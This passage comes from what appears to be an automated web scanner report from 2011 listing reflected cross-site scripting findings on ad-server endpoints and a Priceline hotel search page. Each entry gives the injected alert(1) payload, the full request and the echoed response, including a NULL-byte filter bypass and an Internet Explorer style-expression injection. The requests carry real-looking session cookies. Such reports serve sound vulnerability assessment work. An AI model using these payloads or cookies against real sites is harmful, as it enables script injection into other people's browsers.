       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250aa854";alert(1)//0151e8bd225";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...
4.98. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f040"%3balert(1)//597ece38ae2 was submitted in the cwpid parameter. This input was echoed as 9f040";alert(1)//597ece38ae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=5389369f040"%3balert(1)//597ece38ae2&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Last-Modified: Mon, 26 Sep 02011 15:56:15 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:26 GMT
Content-Length: 8886
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:06 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="5389369f040";alert(1)//597ece38ae2";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="5389369f040";alert(1)//597ece38ae2";var ct="106934";var cf="300X250";var cn="
...[SNIP]...
4.99. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d06a"%3balert(1)//2e758bc4f2d was submitted in the cwpnet parameter. This input was echoed as 2d06a";alert(1)//2e758bc4f2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=12d06a"%3balert(1)//2e758bc4f2d&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Last-Modified: Mon, 26 Sep 02011 15:53:50 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8858
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:33 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:13 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="12d06a";alert(1)//2e758bc4f2d";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = wi
...[SNIP]...
4.100. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a59e1"%3balert(1)//f02f6e681c7 was submitted in the cwrun parameter. This input was echoed as a59e1";alert(1)//f02f6e681c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200a59e1"%3balert(1)//f02f6e681c7&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Last-Modified: Mon, 26 Sep 02011 15:35:33 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:22 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:02 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200a59e1";alert(1)//f02f6e681c7";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase()
...[SNIP]...
4.101. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95803"%3balert(1)//aa35be3a797 was submitted in the cwtagid parameter. This input was echoed as 95803";alert(1)//aa35be3a797 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=10693495803"%3balert(1)//aa35be3a797 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Last-Modified: Mon, 26 Sep 02011 15:44:29 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:36 GMT
Content-Length: 8886
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:15 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="10693495803";alert(1)//aa35be3a797";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="10693495803";alert(1)//aa35be3a797";var cf="300X250";var cn="1";var epid="";var es
...[SNIP]...
4.102. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9992f"%3balert(1)//d829030aa57 was submitted in the cwwidth parameter. This input was echoed as 9992f";alert(1)//d829030aa57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=3009992f"%3balert(1)//d829030aa57&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Last-Modified: Mon, 26 Sep 02011 15:44:29 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8858
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:28 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:08 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="3009992f";alert(1)//d829030aa57";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.to
...[SNIP]...
4.103. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7ee87%3balert(1)//7b85cacff43 was submitted in the cb parameter. This input was echoed as 7ee87;alert(1)//7b85cacff43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded7ee87%3balert(1)//7b85cacff43&pc=7743/12359 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:39 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 968
Cache-control: private
Set-Cookie: khaos=GT3FYRAA-6-CO8F; Domain=.rubiconproject.com; Expires=Tue, 01-Oct-2019 00:01:39 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Sports and Recreation,Hobbies and Interests,Education,Toys and Games,Family and Parenting,Democrats",
tagcloud : [
{ tag: "Spo
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};


try {
oz_onPixelsLoaded7ee87;alert(1)//7b85cacff43(oo_profile);
} catch(ignore) {}
4.104. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the checkInDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006a59b"%3balert(1)//1f6f9173ddff10305 was submitted in the checkInDate parameter. This input was echoed as 6a59b";alert(1)//1f6f9173ddff10305 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011%006a59b"%3balert(1)//1f6f9173ddff10305&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:32 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=AA4C8B607D54B9201A4270A1619E0E91; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 492633


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
] = "/hotel/hotelResultsListView_Change";
c2c["pricePoint"] = "1414";
c2c["numRooms"] = "1";
c2c["initialHotelCount"] = "137";
c2c["travelEndDate"] = "10/16/2011";
c2c["travelStartDate"] = "10/09/2011.6a59b";alert(1)//1f6f9173ddff10305";
c2c["vid"] = "v2011100300373188ec0127";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...
4.105. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf33"style%3d"x%3aexpression(alert(1))"412a6bf160a3d07c7 was submitted in the checkInDate parameter. This input was echoed as edf33"style="x:expression(alert(1))"412a6bf160a3d07c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011edf33"style%3d"x%3aexpression(alert(1))"412a6bf160a3d07c7&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:12 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=44A50B9931539E5695C62CEF274AD5DF; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 492983


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkInDate" name="checkInDate" size="12" value="10/09/2011edf33"style="x:expression(alert(1))"412a6bf160a3d07c7" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...
4.106. http://travela.priceline.com/hotel/newHotelSearch.do [checkOutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

